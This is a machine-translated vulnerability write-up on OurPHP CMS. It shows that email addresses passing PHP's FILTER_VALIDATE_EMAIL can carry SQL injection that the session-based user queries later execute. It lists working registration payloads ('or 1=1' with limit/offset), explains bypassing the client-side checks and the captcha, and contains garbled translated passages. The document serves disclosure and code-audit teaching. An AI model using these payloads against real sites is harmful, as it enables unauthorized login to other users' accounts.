The author of this paper: myndtt (first contribution by readers of Xin'an Road)
1、 Vulnerability premise
1. Download address page (the latest version up to July 6, 2018)
https://pan.baidu.com/s/1D9HWq#list/path=%2F
2. The front desk can register users through email
3. The form of registered email can be as follows
1'/**/or/**/1=1#@qq.com
1'/**/or/**/1=1#@qq.com
2'/**/or/**/1=1/**/limit/**/1/**/offset/**/2#@q.c
2'/**/or/**/1=1/**/limit/**/1/**/offset/**/2#@q.c
4. It's just because it's a little complicated to register these weird mailboxes.
2、 Vulnerability analysis
There is a user login function in the file function \ API \ ourphpuser \ ourphp_system.php
function\api\ourphpuser\ourphp_system.php
During the login process $'user session ['username '] = $useremail; the user registered mailbox, that is, the user name, is assigned to $'user session ['username']
$_SESSION['username'] = $useremail;
$_SESSION['username']
There are a lot of operations in the client \ user \ index.php file that directly use $_session ['username '] to bring in the database query
client\user\index.php
$_SESSION['username']
Even if $_session ['username '] has not been operated and is related to the mailbox registered by the user, go to the user registry to check the relevant information.
$_SESSION['username']
There are functions related to user registration in the file client \ user \ ourphp_play.class.php
client\user\ourphp_play.class.php
The mailbox needs to pass the code $emailvar = filter_var ($userloginemail, filter_valid_email);, as shown in the network document
$emailvar = filter_var($userloginemail, FILTER_VALIDATE_EMAIL);
There is no more intuitive thing, but this filter ﹣ size ﹣ email can be used as a reference. Finally, it is tested that the filter can allow a large number of malicious characters (brackets and commas do not seem to be OK), such as! $% & '* + - / =? ^ {} ~ @. [], so the vulnerability can be generated (of course, the function is not just as simple as characters, such as XX @ Q.C class mailbox can pass, XX @ Q. can not).
FILTER_SANITIZE_EMAIL
!#$%&'*+-/=?^_{|}[email protected][]
[email protected]
[email protected]
3、 Vulnerability demonstration process
1、 Set up a local website, register some normal users for demonstration.
2、 Then register a malicious user 1 '/ * * / or / * * / 1 = 1 ා @ qq.com. Because the foreground has JS detection protection, it is necessary to close the browser and execute JS when registering
1'/**/or/**/1=1#@qq.com
(since the verification code of this CMS is also in JS, it can also bypass the verification code for blasting.)
3、 Log in the mailbox just now
4、 Of course, if you want any user to log in, you need to offset with limit, offset, etc. you can register the following mailbox to offset
2'/**/or/**/1=1/**/limit/**/1/**/offset/**/2#@q.c
2'/**/or/**/1=1/**/limit/**/1/**/offset/**/2#@q.c
A mailbox field length restriction is involved here, which is in the file client \ user \ ourphp_play.class.php
client\user\ourphp_play.class.php
It can be grabbed by packet grabbing, otherwise the characters will be too long because of the problem of URL encoding
Of course, the / * * / between the registered mailbox quotation mark and or can not be used.
4、 Nagging, nagging
1. Due to the limited ability, we can only exploit the vulnerability in this way. I wonder if you have any other ideas.
2. It has been observed that many CMS use filter ﹐ var ($userloginemail, filter ﹐ valid ﹐ email) to filter and detect the mailbox, which will have potential risks, which you can pay attention to during the audit.
filter_var($userloginemail, FILTER_VALIDATE_EMAIL);
3. Back to the CMS, the anti filtering function (no big problem), but it's unnecessary to add a space around when filtering and or.
and
or
4. In the end, the latest version has been modified. It seems that no other operation can be done.
5. This is a very simple loophole. Even so, I wish you all the best!